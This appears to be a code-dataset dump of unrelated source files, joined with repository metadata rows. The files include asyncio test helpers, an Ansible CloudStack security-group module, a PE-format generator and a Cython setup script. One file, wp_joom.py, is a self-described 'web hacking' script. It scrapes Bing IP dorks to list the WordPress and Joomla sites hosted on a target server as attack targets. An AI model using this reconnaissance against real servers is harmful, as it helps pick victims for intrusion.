found_file | = get_unattended_file(backend)
if found_file:
unattended_file = found_file
break
self.unattended_file = unattended_file
if getattr(self, 'finish_program'):
self.finish_program = os.path.join(test.virtdir,
self.finish_program)
if getattr(self, 'cdrom_cd1'):
self.cdrom_cd1 = os.path.join(root_dir, self.cdrom_cd1)
self.cdrom_cd1_mount = tempfile.mkdtemp(prefix='cdrom_cd1_',
dir=self.tmpdir)
if getattr(self, 'cdrom_unattended'):
self.cdrom_unattended = os.path.join(root_dir,
self.cdrom_unattended)
if getattr(self, 'virtio_ |
orionzhou/robin | old/nwk2txt.py | Python | gpl-2.0 | 718 | 0.01532 | #!/usr/bin/env python
import os
import os.path as op
import sys
import argparse
from Bio import Phylo
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description = 'extract leaf(tip) labels from newick tree file'
)
parser.add_argument(
'fi', nargs = '?', help = 'input file (newick)'
)
parser.add_argument(
'fo', nargs = '?', help = 'output file (txt)'
)
args = parser.parse_args()
(fi, fo) = (args.fi, args.fo)
tree = Phylo.read(fi, "ne | wick")
labels = []
for leaf in tree.get_terminals():
labels.append(leaf.name)
fho = open(fo, "w")
for label in reversed(labels):
fho.write(label + "\n")
fho.clos | e()
|
praekelt/vumi-go | go/apps/dialogue/vumi_app.py | Python | bsd-3-clause | 2,008 | 0 | # -*- test-case-name: go.apps.dialogue.tests.test_vumi_app -*-
import pkg_resources
import json
from vxsandbox import SandboxResource
from go.apps.jsbox.vumi_app import JsBoxConfig, JsBoxApplication
from go.apps.dialogue.utils import dialogue_js_config
class PollConfigResource(SandboxResource):
"""Resource that provides access to dialogue conversation config."""
def _get_config(self, conversation):
"""Returns a virtual sandbox config for the given dialogue.
:returns:
JSON string containg the configuration dictionary.
| """
return json.dumps(dialogue_js_config(conversation))
def _get_poll(self, conversation):
"""Returns the poll definition from the given dialogue.
:returns:
JSON string containing the poll definition.
"""
poll = conversation.config.get("poll")
return poll
def handle_get(self, api, command):
key = command.get("key")
if key is None:
return self.reply(command, succes | s=False)
conversation = self.app_worker.conversation_for_api(api)
if key == "config":
value = self._get_config(conversation)
elif key == "poll":
value = self._get_poll(conversation)
else:
# matches what is returned for unknown keys by
# go.apps.jsbox.vumi_app.ConversationConfigResource
value = {}
return self.reply(command, value=value, success=True)
class DialogueConfig(JsBoxConfig):
_cached_javascript = None
@property
def javascript(self):
if self._cached_javascript is None:
self._cached_javascript = pkg_resources.resource_string(
"go.apps.dialogue", "vumi_app.js")
return self._cached_javascript
class DialogueApplication(JsBoxApplication):
CONFIG_CLASS = DialogueConfig
worker_name = 'dialogue_application'
def get_jsbox_js_config(self, conv):
return dialogue_js_config(conv)
|
aneumeier/category | oldcategory/urls.py | Python | bsd-3-clause | 1,181 | 0.008467 | #! /usr/bin/env python2.7
# -*- coding: utf-8 -*-
from django.conf.urls import url, patterns, include
from category.views import CategoryListView, CategoryCreateView, CategoryDetailView, CategoryUpdateView
from category.views import TagListView, TagDetailView, TagCreateView, TagUpdateView
urlpatterns = patterns('',
url(r'^category/$', CategoryListView.as_view(), name="category-home"),
url(r'^category/page/(?P<page>\w+)/$', CategoryListView.as_view(), n | ame="category-home-paginated"),
url(r'^category/add/$', CategoryCreateView.as_view(), name="category-add"),
u | rl(r'^category/(?P<slug>\w+)/$', CategoryDetailView.as_view(), name="category-view"),
url(r'^category/(?P<slug>\w+)/update$', CategoryUpdateView.as_view(), name="category-update"),
)
urlpatterns += patterns('',
url(r'^tag /$', TagListView.as_view(), name="tag-home"),
url(r'^tag/page/(?P<page>\w+)/$', TagListView.as_view(), name="tag-home-paginated"),
url(r'^tag/add/$', TagCreateView.as_view(), name="tag-add"),
url(r'^tag/(?P<slug>[\w-]+)/$', TagDetailView.as_view(), name="tag-view"),
url(r'^tag/(?P<id>\d+)/update/$', TagUpdateView.as_view(), name="tag-update"),
)
|
Lekensteyn/buildbot | master/buildbot/process/results.py | Python | gpl-2.0 | 2,689 | 0.000744 | # This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
from __future__ import absolute_import
from __future__ import print_function
from future.utils import lrange
ALL_RESULTS = lrange(7)
SUCCESS, WARNINGS, FAILURE, SKIPPED, EXCEPTION, RETRY, CANCELLED = ALL_RESULTS
Results = ["success", "warnings", "failure", "skipped", "exception", "retry", "cancelled"]
def statusToString(status):
if status is None:
return "not finished"
if status < 0 or status >= len(Results):
return "Invalid status"
el | se:
return Results[status]
def worst_status(a, b):
# SKIPPED > SUCCESS > WARNINGS > FAILURE > EXCEPTION > RETRY > CANCELLED
# CANCELLED needs to be considered the worst.
for s in (CANCELLED, RETRY, EXCEPTION, FAILURE, WARNINGS, SUCCESS, | SKIPPED):
if s in (a, b):
return s
def computeResultAndTermination(obj, result, previousResult):
possible_overall_result = result
terminate = False
if result == FAILURE:
if not obj.flunkOnFailure:
possible_overall_result = SUCCESS
if obj.warnOnFailure:
possible_overall_result = WARNINGS
if obj.flunkOnFailure:
possible_overall_result = FAILURE
if obj.haltOnFailure:
terminate = True
elif result == WARNINGS:
if not obj.warnOnWarnings:
possible_overall_result = SUCCESS
else:
possible_overall_result = WARNINGS
if obj.flunkOnWarnings:
possible_overall_result = FAILURE
elif result in (EXCEPTION, RETRY, CANCELLED):
terminate = True
result = worst_status(previousResult, possible_overall_result)
return result, terminate
class ResultComputingConfigMixin(object):
haltOnFailure = False
flunkOnWarnings = False
flunkOnFailure = True
warnOnWarnings = False
warnOnFailure = False
resultConfig = [
"haltOnFailure",
"flunkOnWarnings",
"flunkOnFailure",
"warnOnWarnings",
"warnOnFailure",
]
|
CELMA-project/CELMA | celma/testScan.py | Python | lgpl-3.0 | 1,495 | 0.040803 | #!/usr/bin/env python
"""Driver which checks that celma is properly running."""
import os, sys
# If we add to sys.path, then it must be an absolute path
commonDir = os.path.abspath("./../common")
# Sys path is a list of system paths
sys.path.append(commonDir)
from CELMAPy.scanDriver import ScanDriv | er
from bout_runners import basic_runner
|
directory = "CSDXMagFieldScanAr"
# Create object
scanB0 = ScanDriver(directory, runner = basic_runner)
# Set the scan
# NOTE: The scan must be in descending order in order for the growth
# rates post-processing to work
B0 = ( 1.0e-1)
Lx = ( 7.8633)
Ly = (275.2144)
scanParameters = ("B0", "Lx", "Ly")
series_add = (\
("input", "B0", B0),\
("geom" , "Lx", Lx),\
("geom" , "Ly", Ly),\
)
# Set the options
scanB0.setMainOptions(\
scanParameters = scanParameters,\
series_add = series_add ,\
theRunName = directory ,\
make = False ,\
boutRunnersNoise = {"vortD":1e-6},\
)
scanB0.setInitOptions (timestep = 1e-10, nout = 2)
scanB0.setExpandOptions (timestep = 1e-10, nout = 2)
scanB0.setLinearOptions (timestep = 1e-10, nout = 2)
scanB0.setTurbulenceOptions(timestep = 1e-10, nout = 2)
# Set common runner options
scanB0.setCommonRunnerOptions(nproc = 4, cpy_source = True)
# Run
scanB0.runScan()
|
ruibarreira/linuxtrail | usr/lib/python3.4/asyncio/test_utils.py | Python | gpl-3.0 | 11,895 | 0.000588 | """Utilities shared by tests."""
import collections
import contextlib
import io
import logging
import os
import re
import socket
import socketserver
import sys
import tempfile
import threading
import time
import unittest
from unittest import mock
from http.server import HTTPServer
from wsgiref.simple_server import WSGIRequestHandler, WSGIServer
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
from . import base_events
from . import events
from . import futures
from . import selectors
from . import tasks
from .coroutines import coroutine
from .log import logger
if sys.platform == 'win32': # pragma: no cover
from .windows_utils import socketpair
else:
from socket import socketpair # pragma: no cover
def dummy_ssl_context():
if ssl is None:
return None
else:
return ssl.SSLContext(ssl.PROTOCOL_SSLv23)
def run_briefly(loop):
@coroutine
def once():
pass
gen = once()
t = loop.create_task(gen)
# Don't log a warning if the task is not done after run_until_complete().
# It occurs if the loop is stopped or if a task raises a BaseException.
t._log_destroy_pending = False
try:
loop.run_until_complete(t)
finally:
gen.close()
def run_until(loop, pred, timeout=30):
deadline = time.time() + timeout
while not pred():
if timeout is not None:
timeout = deadline - time.time()
if timeout <= 0:
raise futures.TimeoutError()
loop.run_until_complete(tasks.sleep(0.001, loop=loop))
def run_once(loop):
"""loop.stop() schedules _raise_stop_error()
and run_forever() runs until _raise_stop_error() callback.
this wont work if test waits for some IO events, because
_raise_stop_error() runs before any of io events callbacks.
"""
loop.stop()
loop.run_forever()
class SilentWSGIRequestHandler(WSGIRequestHandler):
def get_stderr(self):
return io.StringIO()
def log_message(self, format, *args):
pass
class SilentWSGIServer(WSGIServer):
def handle_error(self, request, client_address):
pass
class SSLWSGIServerMixin:
def finish_request(self, request, client_address):
# The relative location of our test directory (which
# contains the ssl key and certificate files) differs
# between the stdlib and stand-alone asyncio.
# Prefer our own if we can find it.
here = os.path.join(os.path.dirname(__file__), '..', 'tests')
if not os.path.isdir(here):
here = os.path.join(os.path.dirname(os.__file__),
'test', 'test_asyncio')
keyfile = os.path.join(here, 'ssl_key.pem')
certfile = os.path.join(here, 'ssl_cert.pem')
ssock = ssl.wrap_socket(request,
keyfile=keyfile,
certfile=certfile,
server_side=True)
try:
self.RequestHandlerClass(ssock, client_address, self)
ssock.close()
except OSError:
# maybe socket has been closed by peer
pass
class SSLWSGIServer(SSLWSGIServerMixin, SilentWSGIServer):
pass
def _run_test_server(*, address, use_ssl=False, server_cls, server_ssl_cls):
def app(environ, start_response):
status = '200 OK'
headers = [('Content-type', 'text/plain')]
start_response(status, headers)
return [b'Test message']
# Run the test WSGI server in a separate thread in order not to
# interfere with event handling in the main thread
server_class = server_ssl_cls if use_ssl else server_cls
httpd = server_class(address, SilentWSGIRequestHandler)
httpd.set_app(app)
httpd.address = httpd.server_address
server_thread = threading.Thread(target=httpd.serve_forever)
server_thread.start()
try:
yield httpd
finally:
httpd.shutdown()
httpd.server_close()
server_thread.join()
if hasattr(socket, 'AF_UNIX'):
class UnixHTTPServer(socketserver.UnixStreamServer, HTTPServer):
def server_bind(self):
socketserver.UnixStreamServer.server_bind(self)
self.server_name = '127.0.0.1'
self.server_port = 80
class UnixWSGIServer(UnixHTTPServer, WSGIServer):
def server_bind(self):
UnixHTTPServer.server_bind(self)
self.setup_environ()
def get_request(self):
request, client_addr = super().get_request()
# Code in the stdlib expects that get_request
# will return a socket and a tuple (host, port).
| # However, this isn't true for UNIX sockets,
# as | the second return value will be a path;
# hence we return some fake data sufficient
# to get the tests going
return request, ('127.0.0.1', '')
class SilentUnixWSGIServer(UnixWSGIServer):
def handle_error(self, request, client_address):
pass
class UnixSSLWSGIServer(SSLWSGIServerMixin, SilentUnixWSGIServer):
pass
def gen_unix_socket_path():
with tempfile.NamedTemporaryFile() as file:
return file.name
@contextlib.contextmanager
def unix_socket_path():
path = gen_unix_socket_path()
try:
yield path
finally:
try:
os.unlink(path)
except OSError:
pass
@contextlib.contextmanager
def run_test_unix_server(*, use_ssl=False):
with unix_socket_path() as path:
yield from _run_test_server(address=path, use_ssl=use_ssl,
server_cls=SilentUnixWSGIServer,
server_ssl_cls=UnixSSLWSGIServer)
@contextlib.contextmanager
def run_test_server(*, host='127.0.0.1', port=0, use_ssl=False):
yield from _run_test_server(address=(host, port), use_ssl=use_ssl,
server_cls=SilentWSGIServer,
server_ssl_cls=SSLWSGIServer)
def make_test_protocol(base):
dct = {}
for name in dir(base):
if name.startswith('__') and name.endswith('__'):
# skip magic names
continue
dct[name] = MockCallback(return_value=None)
return type('TestProtocol', (base,) + base.__bases__, dct)()
class TestSelector(selectors.BaseSelector):
def __init__(self):
self.keys = {}
def register(self, fileobj, events, data=None):
key = selectors.SelectorKey(fileobj, 0, events, data)
self.keys[fileobj] = key
return key
def unregister(self, fileobj):
return self.keys.pop(fileobj)
def select(self, timeout):
return []
def get_map(self):
return self.keys
class TestLoop(base_events.BaseEventLoop):
"""Loop for unittests.
It manages self time directly.
If something scheduled to be executed later then
on next loop iteration after all ready handlers done
generator passed to __init__ is calling.
Generator should be like this:
def gen():
...
when = yield ...
... = yield time_advance
Value returned by yield is absolute time of next scheduled handler.
Value passed to yield is time advance to move loop's time forward.
"""
def __init__(self, gen=None):
super().__init__()
if gen is None:
def gen():
yield
self._check_on_close = False
else:
self._check_on_close = True
self._gen = gen()
next(self._gen)
self._time = 0
self._clock_resolution = 1e-9
self._timers = []
self._selector = TestSelector()
self.readers = {}
self.writers = {}
self.reset_counters()
def time(self):
return self._time
def advance_time(self, advance):
"""Move test time forward."""
if advance:
self._time += advance
def close(self):
if self._check_on_close:
try:
se |
AIFDR/inasafe | safe/metadata/test/test_hazard_metadata.py | Python | gpl-3.0 | 886 | 0 | # coding=utf-8
"""Test Hazard | Metadata."""
from unittest import TestCase
from safe.common.utilities import unique_filename
from safe.metadata import HazardLayerMetadata
__copyright__ = "Copyright 2016, The InaSAFE Project"
__license__ = "GPL version 3"
__email__ = "info@inasafe.org"
__revision__ = '$Format:%H$'
class TestHazardMetadata(TestCase):
def test_standar | d_properties(self):
metadata = HazardLayerMetadata(unique_filename())
with self.assertRaises(KeyError):
metadata.get_property('non_existing_key')
# from BaseMetadata
metadata.get_property('email')
# from HazardLayerMetadata
metadata.get_property('hazard')
metadata.get_property('hazard_category')
metadata.get_property('continuous_hazard_unit')
metadata.get_property('thresholds')
metadata.get_property('value_maps')
|
angea/corkami | wip/MakePE/examples/PE/max_sec.py | Python | bsd-2-clause | 3,885 | 0.003604 | # a generator for a PE with maximum number of section
# 199 sections confirmed working
SEC_NUMB = 199
SECTIONS_VSTART = 0x02000
f = open("max_sec.asm", "wt")
f.write("""; PE file with a maximum of sections
%include '..\..\consts.asm'
FILEALIGN equ 200h
SECTIONALIGN equ 1000h
org IMAGEBASE
istruc IMAGE_DOS_HEADER
at IMAGE_DOS_HEADER.e_magic, db 'MZ'
at IMAGE_DOS_HEADER.e_lfanew, dd nt_header - IMAGEBASE
iend
nt_header:
istruc IMAGE_NT_HEADERS
at IMAGE_NT_HEADERS.Signature, db 'PE',0,0
iend
istruc IMAGE_FILE_HEADER
at IMAGE_FILE_HEADER.Machine, dw IMAGE_FILE_MACHINE_I386
at IMAGE_FILE_HEADER.NumberOfSections, dw NUMBEROFSECTIONS
at IMAGE_FILE_HEADER.SizeOfOptionalHeader, dw SIZEOFOPTIONALHEADER
at IMAGE_FILE_HEADER.Characteristics, dw CHARACTERISTICS
iend
OptionalHeader:
istruc IMAGE_OPTIONAL_HEADER32
at IMAGE_OPTIONAL_HEADER32.Magic, dw IMAGE_NT_OPTIONAL_HDR32_MAGIC
at IMAGE_OPTIONAL_HEADER32.AddressOfEntryPoint, dd EntryPoint - IMAGEBASE
at IMAGE_OPTIONAL_HEADER32.ImageBase, dd IMAGEBASE
at IMAGE_OPTIONAL_HEADER32.SectionAlignment, dd SECTIONALIGN
at IMAGE_OPTIONAL_HEADER32.FileAlignment, dd FILEALIGN
at IMAGE_OPTIONAL_HEADER32.MajorSubsystemVersion, dw 4
at IMAGE_OPTIONAL_HEADER32.SizeOfImage, dd SIZEOFIMAGE
at IMAGE_OPTIONAL_HEADER32.SizeOfHeaders, dd SIZEOFHEADERS ; can be 0 in some circumstances
at IMAGE_OPTIONAL_HEADER32.Subsystem, dw IMAGE_SUBSYSTEM_WINDOWS_GUI
at IMAGE_OPTIONAL_HEADER32.NumberOfRvaAndSizes, dd NUMBEROFRVAANDSIZES
iend
DataDirectory:
istruc IMAGE_DATA_DIRECTORY2
at ExportsVA, dd Exports_Directory - IMAGEBASE
at ImportsVA, dd IMPORT_DESCRIPTOR - IMAGEBASE
iend
NUMBEROFRVAANDSIZES equ ($ - DataDirectory) / IMAGE_DATA_DIRECTORY_size
SIZEOFOPTIONALHEADER equ $ - OptionalHeader
SectionHeader:
""")
for i in xrange(SEC_NUMB):
f.write("""istruc IMAGE_SECTION_HEADER
at IMAGE_SECTION_HEADER.Name, db ".sec%(counter)02X",0
at IMAGE_SECTION_HEADER.VirtualSize, dd SECTION%(counter)iVSIZE
at IMAGE_SECTION_HEADER.VirtualAddress, dd Section%(counter)iStart - IMAGEBASE
at IMAGE_SECTION_HEADER.SizeOfRawData, dd SECTION%(counter)iSIZE
at IMAGE_SECTION_HEADER.PointerToRawData, dd %(pstart)08xh
at IMAGE_SECTION_HEADER.Characteristics, dd IMAGE_SCN_MEM_EXECUTE ; necessary under Win7 (with DEP?)
iend
""" % {"counter":i, "pstart":(i * 0x200 + SECTIONS_VSTART)})
f.write(
"""
NUMBEROFSECTIONS equ ($ - SectionHeader) / IMAGE_SECTION_HEADER_size
align 400h, db 0
bits 32
EntryPoint equ 0c8000h + IMAGEBASE
""")
f.write("""
SECTION .0 align=200h valign=1000h
Section0PStart equ 0%(SECTIONS_VSTART)08Xh
SIZEOFHEADERS equ $ - IMAGEBASE
Section0Start:
push MB_ICONINFORMATION ; UINT uType
push tada ; LPCTSTR lpCaption
push helloworld ; LPCTSTR lpText
push 0 ; HWND hWnd
call MessageBoxA
push 0 ; UINT uExitCode
call ExitProcess
tada db "Tada!", | 0
helloworld db "Hello World!", 0
;%%IMPORT user32.dll!MessageBoxA
;%%IMPORT kernel32.dll!ExitProcess
;%%IMPORTS
SECTION0VSIZE equ $ - Section0Start
end_:
align 200h, db 0
SECTION0SIZE equ $ - Section0Start
""" % locals())
for i in xrange(SEC_NUMB - 1):
f.write("""Section%(counter) | iStart equ %(RVA)i + IMAGEBASE
SECTION%(counter)iSIZE equ 0200h
SECTION%(counter)iVSIZE equ 1000h
jmp $ - 01000h
db 0h
align 200h, db 0
""" % {"counter":i + 1, "RVA": (i + 3)* 0x1000})
f.write("""
SIZEOFIMAGE equ %(sizeofimage)08Xh
;Ange Albertini, BSD Licence, 2011
""" % {"sizeofimage": SECTIONS_VSTART + SEC_NUMB * 0x1000})
f.close()
|
tsdmgz/ansible | lib/ansible/modules/cloud/cloudstack/cs_securitygroup_rule.py | Python | gpl-3.0 | 12,777 | 0.00227 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2015, René Moser <mail@renemoser.net>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cs_securitygroup_rule
short_description: Manages security group rules on Apache CloudStack based clouds.
description:
- Add and remove security group rules.
version_added: '2.0'
author: "René Moser (@resmo)"
options:
security_group:
description:
- Name of the security group the rule is related to. The security group must be existing.
required: true
state:
description:
- State of the security group rule.
default: present
choices: [ present, absent ]
protocol:
description:
- Protocol of the security group rule.
default: tcp
choices: [ tcp, udp, icmp, ah, esp, gre ]
type:
description:
- Ingress or egress security group rule.
default: ingress
choices: [ ingress, egress ]
cidr:
description:
- CIDR (full notation) to be used for security group rule.
default: '0.0.0.0/0'
user_security_group:
description:
- Security group this rule is based of.
start_port:
description:
- Start port for this rule. Required if C(protocol=tcp) or C(protocol=udp).
aliases: [ port ]
end_port:
description:
- End port for this rule. Required if C(protocol=tcp) or C(protocol=udp), but C(start_port) will be used if not set.
icmp_type:
description:
- Type of the icmp message being sent. Required if C(protocol=icmp).
icmp_code:
description:
- Error code for this icmp message. Required if C(protocol=icmp).
project:
description:
- Name of the project the security group to be created in.
poll_async:
description:
- Poll async jobs until job has finished.
default: true
extends_documentation_fragment: cloudstack
'''
EXAMPLES = '''
---
- name: allow inbound port 80/tcp from 1.2.3.4 added to security group 'default'
local_action:
module: cs_securitygroup_rule
security_group: default
port: 80
cidr: 1.2.3.4/32
- name: allow tcp/udp outbound added to security group 'default'
local_action:
module: cs_securitygroup_rule
security_group: default
type: egress
start_port: 1
end_port: 65535
protocol: '{{ item }}'
with_items:
- tcp
- udp
- name: allow inbound icmp from 0.0.0.0/0 added to security group 'default'
local_action:
module: cs_securitygroup_rule
security_group: default
protocol: icmp
icmp_code: -1
icmp_type: -1
- name: remove rule inbound port 80/tcp from 0.0.0.0/0 from security group 'default'
local_action:
module: cs_securitygroup_rule
security_group: default
port: 80
state: absent
- name: allow inbound port 80/tcp from security group web added to security group 'default'
local_action:
module: cs_securitygroup_rule
security_group: default
port: 80
user_security_group: web
'''
RETURN = '''
---
id:
description: UUID of the of the rule.
returned: success
type: string
sample: a6f7a5fc-43f8-11e5-a151-feff819cdc9f
security_group:
description: security group of the rule.
returned: success
type: string
sample: default
type:
description: type of the rule.
returned: success
type: string
sample: ingress
cidr:
description: CIDR of the rule.
returned: success and cidr is defined
type: string
sample: 0.0.0.0/0
user_security_group:
description: user security group of the rule.
returned: success and user_security_group is defined
type: string
sample: default
protocol:
description: protocol of the rule.
returned: success
type: string
sample: tcp
start_port:
description: start port of the rule.
returned: success
type: int
sample: 80
end_port:
description: end port of the rule.
returned: success
type: int
sample: 80
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.cloudstack import AnsibleCloudStack, cs_argument_spec, cs_required_together
class AnsibleCloudStackSecurityGroupRule(AnsibleCloudStack):
def __init__(self, module):
super(AnsibleCloudStackSecurityGroupRule, self).__init__(module)
self.returns = {
'icmptype': 'icmp_type',
'icmpcode': 'icmp_code',
'endport': 'end_port',
'startport': 'start_port',
'protocol': 'protocol',
'cidr': 'cidr',
'securitygroupname': 'user_security_group',
}
def _tcp_udp_match(self, rule, protocol, start_port, end_port):
return (protocol in ['tcp', 'udp'] and
protocol == rule['protocol'] and
start_port == int(rule['startport']) and
end_port == int(rule['endport']))
def _icmp_match(self, rule, protocol, icmp_code, icmp_type):
return (protocol == 'icmp' and
protocol == rule['protocol'] and
icmp_code == int(rule['icmpcode']) and
icmp_type == int(rule['icmptype']))
def _ah_esp_gre_match(self, rule, protocol):
return (protocol in ['ah', 'esp', 'gre'] and
protocol == rule['protocol'])
def _type_security_group_match(self, rule, security_group_name):
return (security_group_name and
'securitygroupname' in rule and
security_group_name == rule['securitygroupname'])
def _type_cidr_match(self, rule, cidr):
return ('cidr' in rule and
| cidr == rule['cidr'])
def _get_rule(self, rules):
user_security_group_name = self.module.params.get('user_security_group')
cidr = self.module.params.get('cidr')
protocol = self.module.params.get('protocol')
start_port = self.module.params.get('start_port')
end_port = self.get_or_fallback('end_port', | 'start_port')
icmp_code = self.module.params.get('icmp_code')
icmp_type = self.module.params.get('icmp_type')
if protocol in ['tcp', 'udp'] and (start_port is None or end_port is None):
self.module.fail_json(msg="no start_port or end_port set for protocol '%s'" % protocol)
if protocol == 'icmp' and (icmp_type is None or icmp_code is None):
self.module.fail_json(msg="no icmp_type or icmp_code set for protocol '%s'" % protocol)
for rule in rules:
if user_security_group_name:
type_match = self._type_security_group_match(rule, user_security_group_name)
else:
type_match = self._type_cidr_match(rule, cidr)
protocol_match = (self._tcp_udp_match(rule, protocol, start_port, end_port) or
self._icmp_match(rule, protocol, icmp_code, icmp_type) or
self._ah_esp_gre_match(rule, protocol))
if type_match and protocol_match:
return rule
return None
def get_security_group(self, security_group_name=None):
if not security_group_name:
security_group_name = self.module.params.get('security_group')
args = {
'securitygroupname': security_group_name,
'projectid': self.get_project('id'),
}
sgs = self.query_api('listSecurityGroups', **args)
if not sgs or 'securitygroup' not in sgs:
self.module.fail_json(msg="security group '%s' not found" % security_group_name)
return sgs['securitygroup'][0]
def add_rule(self):
security_group = self.get_security_group()
args = {}
user_security_group_name = self.module.params.get('user_security_group')
# the user_security_group and cidr are mutually_exclusive, but cidr is defaulted to 0.0.0.0/0.
# that is why we ignore if we have a user_security_group.
if user_security_group_name:
args['usersecuritygrouplist'] = []
user_s |
lordnotfound404/404web | wp_joom.py | Python | gpl-2.0 | 4,272 | 0.034176 | import urllib
import os
import re
from time import sleep
from datetime import date
def welcome(modulename):
print """
|==========================================================|
|====================== [ 404 ] ========================|
|==============[ lordnotfound404@gmail.com ]===============|
|==========[ https://www.facebook.com/404andreas]==========|
|==========================================================|
| **** Web Hacking framwork by 404 *** |
|==========================================================|
"""
print '####### ' + modulename
###########################################################
def serverTargeting(IP):
welcome("perform many dork based scans")
#fil = open(logsfilename+'.txt','a')
#fil.write("[Info] : new target "+now.strftime("%A %d %b %Y")+"IP adress : "+IP)
#print "[Info] : new target "+now.strftime("%A %d %b %Y")+"IP adress : "+IP
#fil.write("[Info] : getting links from Bing")
print " New TARGET " + IP
print "[Info] : getting Hosted domains from Bing"
file2 =open(IP+'hosted.txt','w')
start=0
end=200
sleep(3)
dork = 'IP:'+IP
#print "[info]Getting Websites From Bing ... "
while start <= end :
try:
con = urllib.urlretrieve('http://www.bing.com/search?q='+dork+"&first="+str(start))
#con = con = urllib.urlretrieve('http://www.bing.com/search?q=ip%3A41.203.11.42+%22php%3Fid%3D%22&go=&qs=ds&form=QBLH&filt=all')
conf = open(con[0])
readd=conf.read()
find=re.findall('<h2><a href="(.*?)"',readd)
start = start+10
except IOError:
print "[ERROR]network error "
print "[Info]reconnecting "
sleep(10)
print "[Info]retrying "
try :
for i in range(len(find)):
rez=find[i]
file2.write(rez + '\n')
except IOError:
print "[ERROR]No result found"
print "[Info] : links list saved in file "+IP+"hosted.txt"
print "[Info] : getting wordpress sites from server ...."
file2 =open(IP+'wp_Powred.txt','w')
start=0
end=200
sleep(3)
dork = 'IP:'+IP + " /wp-content/"
#print "[info]Getting Websites From Bing ... "
while start <= end :
try:
con = urllib.urlretrieve('http://www.bing.com/search?q='+dork+"&first="+str(start))
#con = con = urllib.urlretrieve('h | ttp://www.bing.com/search?q=ip%3A41.203 | .11.42+%22php%3Fid%3D%22&go=&qs=ds&form=QBLH&filt=all')
conf = open(con[0])
readd=conf.read()
find=re.findall('<h2><a href="(.*?)"',readd)
start = start+10
except IOError:
print "[ERROR]network error "
print "[Info]reconnecting "
sleep(10)
print "[Info]retrying "
try :
for i in range(len(find)):
rez=find[i]
file2.write(rez + '\n')
except IOError:
print "[ERROR]No result found"
#getsitesbing("IP:"+IP+" /wp-content/" , 'wp_Powred' )
print "[Info] : links list saved in file "+IP+"wp_Powred.txt"
print "[Info] : getting joomla sites from server ...."
file2 =open(IP+'joom_Powred.txt','w')
start=0
end=200
sleep(3)
dork = 'IP:'+IP +" index.php?option=com_content"
#print "[info]Getting Websites From Bing ... "
while start <= end :
try:
con = urllib.urlretrieve('http://www.bing.com/search?q='+dork+"&first="+str(start))
#con = con = urllib.urlretrieve('http://www.bing.com/search?q=ip%3A41.203.11.42+%22php%3Fid%3D%22&go=&qs=ds&form=QBLH&filt=all')
conf = open(con[0])
readd=conf.read()
find=re.findall('<h2><a href="(.*?)"',readd)
start = start+10
except IOError:
print "[ERROR]network error "
print "[Info]reconnecting "
sleep(10)
print "[Info]retrying "
try :
for i in range(len(find)):
rez=find[i]
file2.write(rez + '\n')
except IOError:
print "[ERROR]No result found"
#getsitesbing("IP:"+IP+" index.php?option=com_content" , 'joom_Powred' )
print "[Info] : links saved in file "+IP+"joom_Powred.txt"
print " ALL is done good luck dude !!!!! "
###########################################################
welcome("Joomla and wordpress Sites Finder")
IPadress=raw_input("[INFO] : enter IP adress : ")
serverTargeting(IPadress)
|
fdemian/Morpheus | api/Crypto.py | Python | bsd-2-clause | 288 | 0 | im | port bcrypt
def hash_password(password):
default_rounds = 14
bcrypt_salt = bcrypt.gensalt(default_rounds)
hashed_password = bcrypt.hashpw(password, bcrypt_salt)
return hashed_password
def check_password(pas | sword, hashed):
return bcrypt.checkpw(password, hashed)
|
bzzzz/cython | setup.py | Python | apache-2.0 | 12,175 | 0.005092 | from distutils.core import setup, Extension
fro | m distutils.sysconfig import get_python_lib
import os, os.path
import sys
if 'sdist' in sys.argv and sys.platform != "win32":
assert os.system("git show-ref -s HEAD > .gitrev") == 0
if sys.platform == "darwin":
# Don't create resource files on OS X tar.
os.environ['COPY_EXTENDED_ATTRIBUTES_DISABLE'] = 'true'
os.environ['COPYFILE_DISABLE'] = 'true'
setup_args = {}
def add_command_class(name, cls):
cmdclasses = setup_args.get('cmdclass', {} | )
cmdclasses[name] = cls
setup_args['cmdclass'] = cmdclasses
if sys.version_info[0] >= 3:
import lib2to3.refactor
from distutils.command.build_py \
import build_py_2to3 as build_py
# need to convert sources to Py3 on installation
fixers = [ fix for fix in lib2to3.refactor.get_fixers_from_package("lib2to3.fixes")
if fix.split('fix_')[-1] not in ('next',)
]
build_py.fixer_names = fixers
add_command_class("build_py", build_py)
pxd_include_dirs = [
directory for directory, dirs, files in os.walk('Cython/Includes')
if '__init__.pyx' in files or '__init__.pxd' in files
or directory == 'Cython/Includes' or directory == 'Cython/Includes/Deprecated']
pxd_include_patterns = [
p+'/*.pxd' for p in pxd_include_dirs ] + [
p+'/*.pyx' for p in pxd_include_dirs ]
if sys.version_info < (2,4):
install_base_dir = get_python_lib(prefix='')
import glob
patterns = pxd_include_patterns + [
'Cython/Plex/*.pxd',
'Cython/Compiler/*.pxd',
'Cython/Runtime/*.pyx'
]
setup_args['data_files'] = [
(os.path.dirname(os.path.join(install_base_dir, pattern)),
[ f for f in glob.glob(pattern) ])
for pattern in patterns
]
else:
setup_args['package_data'] = {
'Cython.Plex' : ['*.pxd'],
'Cython.Compiler' : ['*.pxd'],
'Cython.Runtime' : ['*.pyx', '*.pxd'],
'Cython' : [ p[7:] for p in pxd_include_patterns ],
}
# This dict is used for passing extra arguments that are setuptools
# specific to setup
setuptools_extra_args = {}
# tells whether to include cygdb (the script and the Cython.Debugger package
include_debugger = sys.version_info[:2] > (2, 5)
